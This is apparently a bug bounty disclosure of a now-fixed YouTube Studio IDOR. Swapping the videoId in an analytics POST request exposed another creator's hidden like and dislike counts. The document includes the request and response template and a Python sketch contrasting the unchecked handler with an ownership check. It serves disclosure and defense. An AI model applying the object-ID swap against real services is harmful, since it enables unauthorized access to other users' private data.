Steps to reproduce:
Victim:
1. Upload video.
2. Edit video.
3. Change the setting "Show how many viewers like and dislike this video" ---> "Don't show how many viewers like and dislike this video".
4. Save.
Attacker:
1. Go to YouTube Studio
2. Video analytics.
Request:
[POST] https://studio.youtube.com/youtubei/v1/analytics_data/get_cards?alt=json&key=...
{"entity":{"videoId":"your_video_id"} ---> {"entity":{"videoId":"victim_video_id"}
Response:
"metrics": {"viewCount": "victim_video_viewCount", "commentCount": "victim_video_commentCount", "likeCount": "victim_video_likeCount", "dislikeCount": "victim_video_dislikeCount"}
The response shows the like and dislike counts even though the victim has hidden them.
PoC video: https://youtu.be/plwv_2pDApk
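The missing control here is an object-level ownership check on the videoId sent in the request body. The sketch below is an added example, not YouTube's code or Google's actual fix: it models the handler as the report describes it next to a version that ties the videoId to the authenticated channel. The function names, channel names and counts are all assumptions made up for illustration.

```python
from dataclasses import dataclass


class Forbidden(Exception):
    """Caller may not read Studio analytics for the requested video."""


@dataclass(frozen=True)
class Video:
    owner_channel: str
    hide_ratings: bool  # the "Don't show" setting; only affects the public page
    metrics: dict


# Constructed sample data; channel names and counts are made up.
VIDEOS = {
    "your_video_id": Video("attacker_channel", False, {
        "viewCount": "10", "commentCount": "1",
        "likeCount": "2", "dislikeCount": "0"}),
    "victim_video_id": Video("victim_channel", True, {
        "viewCount": "1200", "commentCount": "14",
        "likeCount": "90", "dislikeCount": "7"}),
}


def get_cards_unchecked(caller_channel: str, body: dict) -> dict:
    """Behaviour described in the report: videoId from the body is trusted."""
    video = VIDEOS[body["entity"]["videoId"]]
    return {"metrics": dict(video.metrics)}


def get_cards_checked(caller_channel: str, body: dict) -> dict:
    """Owner-only analytics: the session's channel must own the video."""
    video = VIDEOS.get(body.get("entity", {}).get("videoId"))
    # Same error for unknown and foreign IDs, so the endpoint does not
    # confirm which video IDs exist.
    if video is None or video.owner_channel != caller_channel:
        raise Forbidden("caller does not own this video")
    return {"metrics": dict(video.metrics)}


if __name__ == "__main__":
    swapped = {"entity": {"videoId": "victim_video_id"}}
    print(get_cards_unchecked("attacker_channel", swapped))
    try:
        get_cards_checked("attacker_channel", swapped)
    except Forbidden as exc:
        print("denied:", exc)
```

The caller's channel must come from the authenticated session, never from the request body, or the check can be bypassed the same way.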
Timeline:
mm/dd/yyyy
02/13/2021 - Bug Found
02/13/2021 - Submit Report
02/17/2021 - Triaged
Status: New - Assigned
Priority: P4 - P2
02/23/2021 - Won't Fix (Not Reproducible)
Status: Assigned - Won't Fix (Not Reproducible)
02/24/2021 - Reopened
Status: Won't Fix (Not Reproducible) - Assigned
02/25/2021 - Won't Fix (Not Reproducible)
Status: Assigned - Won't Fix (Not Reproducible)
03/04/2021 - Reopened
Status: Won't Fix (Not Reproducible) - Assigned
03/04/2021 - Accepted
Status: Assigned - Accepted
Severity: S4 - S2
Type: Customer Issue - Bug
03/10/2021 - Bounty awarded by Google VRP.
03/26/2021 - Fixed
LinkedIn: Alessandro Rumampuk
YouTube: R,ando
Facebook: Ando
Twitter: R ando
How much was the bounty, bro? What P level was the bug's severity?
What's the impact?
An attacker can see the like and dislike counts, even though the victim has set the video's like and dislike counts not to be shown.